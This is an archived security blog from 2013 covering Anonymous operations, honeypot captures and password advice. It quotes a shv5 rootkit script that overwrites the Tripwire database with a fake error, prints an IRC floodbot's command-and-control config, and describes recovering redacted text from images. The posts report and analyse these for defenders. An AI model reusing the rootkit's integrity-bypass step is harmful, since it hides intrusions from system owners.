This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

FREE eBook: Intrusion Detection Systems with Snort: Advanced IDS Techniques


Receive Your Complimentary eBook NOW!

"Intrusion Detection Systems with Snort: Advanced IDS Techniques Using Snort, Apache, MySQL, PHP, and ACID"

Protect your network with Snort: the high-performance, open source IDS. Snort gives network administrators an open source intrusion detection system that outperforms proprietary alternatives.

Now, Rafeeq Ur Rehman explains and simplifies every aspect of deploying and managing Snort in your network. You'll discover how to monitor all your network traffic in real time; update Snort to reflect new security threats; automate and analyze Snort alerts; and more. Best of all, Rehman's custom scripts integrate Snort with Apache, MySQL, PHP, and ACID - so you can build and optimize a complete IDS solution more quickly than ever before.

  • An expert introduction to intrusion detection and the role of Snort
  • Writing and updating Snort rules to reflect the latest attacks and exploits
  • Contains detailed coverage of Snort plug-ins, preprocessors, and output modules
  • Logging alerts to a MySQL database
  • Using ACID to search, process, and analyze security alerts
  • Using SnortSnarf to analyze Snort log files
  • XML support for Snort via the Simple Network Markup Language (SNML)


Request your free copy today!


@ChaCha You Guys Rock, Thanks for the Help!

You might have read my open letter to ChaCha regarding copyright infringement and fair use of my SnapChat blog post.

I'm happy to say that ChaCha was very polite, and corrected the issue immediately along with an apology!

I didn't have to jump through any legal hoops or anything.  I politely asked, and they reacted right away.

This is how human resources and customer service should be done folks.

Stay Classy ChaCha!

Tech Support SCAM! The MUST SEE Video about iYogi!

Having personally seen the fear mongering iYogi used against a family member to get you to pay for their services (and having to clean up her computer after their software was installed), this video does not shock me in the least.  Share this video with all your friends and family and warn them about the scam which is iYogi tech support.


An Open Letter to @ChaCha Regarding Copyright Infringement

UPDATE: ChaCha was VERY helpful with this, and resolved the issue right away! Stay classy ChaCha!

This evening I stumbled on something a little disturbing.  ChaCha has answered the question "How do I save a picture from SnapChat on a droid?" word-for-word with text from my own blog post on the subject.

As such, I have submitted the following letter to ChaCha.

Hello,

I happened across the answer to "How do I save a picture from Snapchat on a Droid?" tonight, and I'm a little upset. The answer is directly copied from a post on my blog caffeinesecurity.blogspot.com.

In accordance with Fair Use, I would like to request that should you wish to continue to include this content word-for-word from my blog, that you also include a link to the source blog post http://caffeinesecurity.blogspot.com/2012/12/snapchat-covert-screen-capture-for.html. I feel this would be a win-win for both of us, and we won't need to worry about getting your legal department involved.

I eagerly await your response within 10 business days.

Thanks,

Ken
Caffeine Security



FREE CLASS!!! Malicious Software and its Underground Economy

Starting June 13 I will be taking the free Coursera course "Malicious Software and its Underground Economy".

The course will explore the world of malicious software, and look at how it's used to generate millions of dollars per year.

If you have some programming experience, as well as security experience, I'd like to encourage you to sign up!

OpPetrol - It's Not About the Oil

I've posted a new Threat Watch bulletin for OpPetrol - a multi-target operation being run by Anonymous.

Updates to the bulletin can be read here.

Below is the bulletin posted in its entirety.


INTEL BRIEF
First Release: 19MAY2013
Updated: 19MAY2013
Subject: Anonymous "OpPetrol"

Target: United States, Canada, United Kingdom, Israel, Saudi Arabia (only Government), China, Italy, France, Germany, Kuwait (only government) and Qatar (only government)

Specific named targets:
Saudi Arabia government emails (Most likely Phishing - http://pastebin.com/0Yr6kyWA)

Additional high probability targets:
Pending

Date: June 20, 2013

Attackers:
AnonGhost
Others Pending
Attack types:
Distributed Denial of Service Attacks (DDoS)
Website Defacement
Possible leak of sensitive information
Details:
Original announcement on Pastebin: http://pastebin.com/Xsewfqvr
Second announcement on Pastebin: http://pastebin.com/38kvvD1S

QuoteAs petrol is sold with the dollar currency of the U S we find this not acceptable when the oil should be sold at the country of Origin, making petrol a lot less then what you the citizens is paying for it.

Additional Analysis:
A look at the target list vs. top oil producers of the world (data from CIA World Factbook)
 Rank Target List Top Oil Producers Amount Produced (BBL/Day)
 1 No Russia 10,370,000
 2 Yes Saudi Arabia 10,000,000
 3 Yes United States 9,023,000
 4 No Iran 4,231,000
 5 Yes China 4,150,000
 6 Yes Canada 3,592,000
 7 No United Arab Emirates 3,087,000
 8 No Mexico 2,934,000
 9 No Iraq 2,900,000
 10 Yes Kuwait 2,682,000
 11 No Brazil 2,633,000
 12 No Nigeria 2,525,000
 13 No Venezuela 2,470,000
 14 No Norway 1,998,000
 15 No Algeria 1,885,000
 16 No Angolia 1,840,000
 17 No Kazakhstan 1,635,000
 18 Yes Qatar 1,631,000
 19 Yes United Kingdom 1,099,000
 ... ... ...
 43 Yes Germany 165,300
 50 Yes Italy 99,200
 60 Yes France 49,530
 101 Yes Israel 100
 102 No Jordan 20
 103 No Slovenia (Last Place) 5
Based upon the above target list, this attack has nothing to do with oil exports, especially since Israel only produces 100 BBL/Day and is third from the bottom.

Also of interesting note, the announcement speaks about Syria stealing your retirement and savings, but it was Cyprus, not Syria, that raided savings accounts when the country went bankrupt.

This operation appears to simply be an attempt at OpUSA and OpIsrael again, with a few extra countries thrown into the mix so that the operation can be declared a "success" even if only of the target countries is compromised.  This operation is simply a publicity stunt, and not by any means a meaningful attempt to change anything.


Recommendations: Standard recommendations apply
Note: Based upon the past failures of OpIsrael and OpUSA, do not expect a large turnout for this operation either.

Prior to June 20 - In order for multiple sites to be defaced at the same time, malware infection or compromise of credentials must occur ahead of time.  Change passwords, and perform full antivirus scans of systems.  Monitor firewall logs for suspicious activity involving external IP addresses.  Be vigilant, and warn employees of highly targeted phishing attacks.
On June 20 - Monitor network traffic, and coordinate with ISP should any signs of DDoS be seen.
After June 20 - Look for signs of compromise after DDoS attack.  A common technique now being employed by multiple organizations is to mask hacking attacks with DDoS attacks.

New Honeypot Online!

I just got my second honeypot up an running - Glastopf!

This honeypot will allow me to capture HTTP based attacks, as well as the SSH attacks I'm already capturing with Kippo.

If I get any interesting hits I'll be sure to post!

How Not to Redact a Document, Part 2

Last year I made a post about How Not To Redact a Document, in which I showed some digitally redacted documents can have have the redaction removed by simply highlighting the redacted text.

Unfortunately, digitally redacted documents aren't the only ones susceptible to attack.

Recently the IRS has come under fire for sending to Tea Party groups probing letters threatening their non-profit status unless they answer a large number of questions.

Fox News redacted parts of the letter, as you can see below.


However, Fox News really failed at their redaction process, and left a lot of sensitive information exposed.

I personally use a photo editor called Zoner Photo Studio, but the same technique can be used in Photoshop.

First, lets play with the image levels a little bit...


Move some sliders around, and text begins to magically appear!


Now let's adjust the contrast and brightness a little.


After performing the manipulations above, I doubled the size of the image for easier examination.

Click to View Full Size
You can pretty clearly make out some of the details, including mailing address and phone numbers.

Of course this information is already available online anyways, so I'm not sure why it was redacted.  However, this could be a very interesting technique to use against Freedom of Information Act documents with redacted sections.

Once again, related reading: A Primer On Electronic Document Security.
Maybe someone will pay attention this time.

@USNISTGOV CVE Alerts Now On @CaffSec Twitter

Thanks to the folks at NIST for providing an RSS feed of new CVEs, I have incorporated CVEs into my automated #exploitAlert feed on Twitter.

In addition to CVE content, the #exploitAlert feed provides information on new vulnerabilities/exploits found on PasteBin and similar sites.

If you're interested in how the CVE feed works, I have made the feed available on my IFTT profile.

IRC Floodbot Placed on My Honeypot

Someone dropped off an IRC Floodbot today on my honeypot.

It's nothing spectacular or groundbreaking, and appears to have been around since at least 2009, maybe earlier.

I've replaced the binaries with VirusTotal analysis, and posted everything else as I received it.

You can browse the shell scripts, as well the the malware's help file, at my Google Code site.

By the way, here's the config info for the bot's command and control center:
NICK Hack
USERFILE 1
CMDCHAR *
LOGIN eliata
IRCNAME juno boot flood
MODES +ix-ws
TOG CC 0
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 1
TOG NOIDLE 1
CHANNEL #m0atrea
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nt
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
SERVER irc.deadly-co.ro 6667

I hope you enjoy examining the bot.

Hacking to Setup a Free Counter Strike Server?

This week an attacker cracked my honeypot's root password "123456" and tried to install software I've never seen before.

The file was quite large for most malware packages, at over 20 MB.  Curiously I uploaded the file to VirusTotal and was quite surprised that it came back completely clean.
VirusTotal Analysis of csservers_redirecte_linux_hlds.zip
After digging into the file further, I found that the file was actually a Counter Strike server?

Sure enough, more digging the more I verified the hacker had compromised my honeypot with the sole purpose of running a Counter Strike server.


I use the term hacker loosely because based upon the the attack, the person did not seem very knowledgeable outside of using his install scripts.

You can read the full attack logs on Google Drive.

This is the first time I've ever seen someone compromise a system to install a game server.  I know there was a day when IRC chat bots were all the rage that people would compromise servers just to install them, but they're lightweight and don't generate a lot of traffic.  A gaming server is going to generate a lot of traffic and CPU load, and surely would be noticed almost right away, right???

Identifying Hacker Group Locations Based Upon Temporal Signatures

What day and time an event occurs can sometimes be very helpful in determining the origin of that event.

Analysis Intelligence just posted an excellent article titled "Pattern of Life and Temporal Signatures of Hacker Organizations".

This article explores the possibilities of using the day/time of hacking activity to determine not only what part of the world the activity originated from, but also if they're a state sponsored group or not.

I highly encourage you to check out the article, and if applicable, apply it to your own research.

OpUSA Failure Shows Anonymous is Past Their Prime

There have been indications of this for quite a while now, but I think it's time someone finally came out and said it.

Anonymous is losing steam, and quickly dying.

That's right, Anonymous is quickly becoming an obsolete part of a forgotten era of the Internet.

OpUSA promised to be a major cyber threat against the United States Government and major banks.  Websites such as FBI.gov, Whitehouse.gov, and Bank of America were the key targets.

The actual damage? (per http://security.radware.com/Threats-Attacks/opusa/)

  • An alert system which was being decomissioned by the Honolulu Police Department
  • A Blood Bank
  • Embassy of Cape Verde in the US
  • ...and a handful of low-traffic websites which most people have never heard of.
So what happened? Simply put, most of the "smart" hackers in Anonymous have already been arrested, or have realized that prison orange does not look good on them.  Compound with this the fact that members of Anonymous now know that their organization has been compromised by terrorist groups and law enforcement alike, many members of Anonymous are now most likely finished with the group's illegal activities. A quick look at number of news headlines about "Anonymous Hacker" shows the group has definitely gone past their prime, and may soon be going the way of the dodo, at least for their hacking activities.




How much longer will Anonymous hacking groups last? Based upon current trends they may still be around for a while yet, but gone are the days where Anonymous should be considered a serious threat.

Instead, after the failure of OpUSA, they're now probably the laughing stock of the Internet.

If you're interested, you can pick up a #OpUSA #FAIL t-shirt from my CafePress shop.

The NSA's Guide to Internet Research

The NSA recently released on their Declassification and Transparency page "Untangling The Web - A Guide to Internet Research".

This 642 page document contains search techniques and tips for everything from basic search fundamentals to "Google Hacking" and even how to find information on the "Invisible" internet.







OpUSA Updated Target List Posted

I've managed to get a copy of the OpUSA target list.  If you're at one of these organizations, be extra vigilant.

HIGH profile target list
http://www.defense.gov/
http://pentagontours.osd.mil/
http://www.pentagonchannel.mil/
http://www.archives.gov/
http://www.whs.mil/
http://www.nsa.gov/
http://nsa.nato.int
http://www.fbi.gov/
http://www.whitehouse.gov/

Additional targets are listed in the updated Threat Watch brief.

#OpUSA - So far an Epic Failure

In the early hours of #OpUSA, in the words of Anonymous "Op has failed to deliver!"

Anonymous et al. actually started their "hacking spree" on May 4...but no one really noticed.  Probably because most of the websites were foreign hosted sites (you know, outside the target "USA"), or sites most people have never even heard of.  Somewhere the SEO marketing gurus of jrzydevilmarketing.info and clearseo.net are quietly cursing, but if a tree falls on a SEO marketer's website, but no one ever visits it, does it still make a sound?

The attackers stepped up their game on May 5 and hacked even more websites.  And by more, I mean more websites most people have never heard of in the USA.

Protip: Hacking Chinese, French, and Italian websites in the name of #OpUSA does not make a bit of difference to 99.999% of people in the USA.

May 6 - They HACKED BANK OF AMERICA.  OMG!!!! No...wait...they hacked Blood Bank of America.  Really guys? You hacked a blood bank? This speaks of fail on so many levels its not funny.  That's like using your bat to call out a home run, then hitting a ground rule double.  Sure, it just went out of the park, but it's nowhere near as effective.

Early hours of May 7 - A short list of websites was published (because these guys are clearly riding a "short bus"), and finally a target barely worth noting - the Honolulu Police Department alert system which isn't even used anymore.
“HPD Alerts was a pilot program (used) to provide breaking information to the public,” Yu said. “It was recently discontinued due to technical problems not associated with the cyberattack.”

So let's see - Anonymous and company planned to take down Whitehouse.gov, FBI, and Bank of America.

In fact, they even made this statement:
Anonymous will make sure that this May 7th will be a day to remember. On that day Anonymous will start phase one of operation USA. America you have committed multiple war crimes in Iraq, Afghanistan, Pakistan, and recently you have committed war crimes in your own country

So...you've got less than 24 hours for "OpUSA" to be a "day to remember".  So far it's been an epic failure which will be forgotten by Friday.

#TickTock

eBook Review: The Password Management Guide

Let's be honest.  Most people have a small set of passwords they reuse on multiple websites.  They come up with a password they think is secure, but by reusing the password on multiple sites, a compromise of one account results in a compromise of the rest.

But nobody would want to hack you, right?  Wrong.  There's a lot of value in a compromised account.

  • Do you use Amazon.com? A compromised account can order goods and have them shipped to a different address.
  • Do you use PayPal? A compromised account could wipe out your bank account.
  • Do you email family and friends? A compromised account could be used by scammers to trick your family and friends into sending money through Western Union to the scammer overseas.
  • Do you use social networking? A compromised account could be used to spam your friends
But remembering multiple, complex passwords is hard!!!!

It doesn't have to be.

I was very impressed by the information contained within The Password Management Guide.

The guide covers the following topics and more:

  • Dangers of password re-use
  • How to create a secure password
  • Examples of available password manager programs
  • Two-factor Authentication
  • How to monitor to see if your password has been compromised
I found the guide very well written, and it should be extremely useful to anyone regardless of "tech savvy" level.

And the good news is, for a limited time you can get the 35 page eBook FREE!

Download Here!

Do you like the guide? Hate it? Feel free to let me know in the comments section below.

OpUSA to Strike US Government and Banking Infrastructure May 7

Anonymous and several other hacking groups are planning to attack the US Government and Banking Infrastructure on May 7, 2013.

I added a threat briefing on OpUSA, what's being targeted, and by who, to my Threat Watch site.

Currently, the only named targets of this attack are Whitehouse.gov, FBI, and Bank of America.  However, I'm sure other targets will be included.

If you work for a government agency, or in the banking agency, be vigilant, and be on the lookout for highly targeted phishing attacks.

You can read the full briefing at my Threat Watch site.

Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats

Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention.  This code is from the shv5 rootkit, which was released in 2010, and is detected by most antivirus scanners.

echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"

if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
echo "${RED} ALERT! tripwire database found ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
echo "-----------------------------------------" > $twd
echo "Tripwire segment-faulted !" >> $twd
echo "-----------------------------------------" >> $twd
echo "" >> $twd
echo "The reasons for this may be: " >> $twd
echo "" >> $twd
echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
echo "corrupted files while checking for possible change etc." >> $twd
echo ""
echo "pls. rerun tripwire to build the database again!" >> $twd
echo "" >> $twd
else
echo "${WHI} lucky you: Tripwire database not found. ${RES}"
fi
else
echo "${WHI} guess not. ${RES}"
fi

April 2013 Set a New Record for My Blog - Over 14,000 page views!

I'm happy to say that April 2013 set a new record for my blog, with 14,573 unique page views.

I'd just like to say thank you to everyone who takes the time to read my blog!

With this large influx of visitors, I need to start working on more research projects and more content.

Some of the research projects I want to get started on require funding.  So if you would be so kind as to take a look at my Complimentary Industry Resources site, find something you like, and sign up for it, I would greatly appreciate it.  It won't cost you anything, and I get paid for every download or magazine subscription!

Thanks!!!!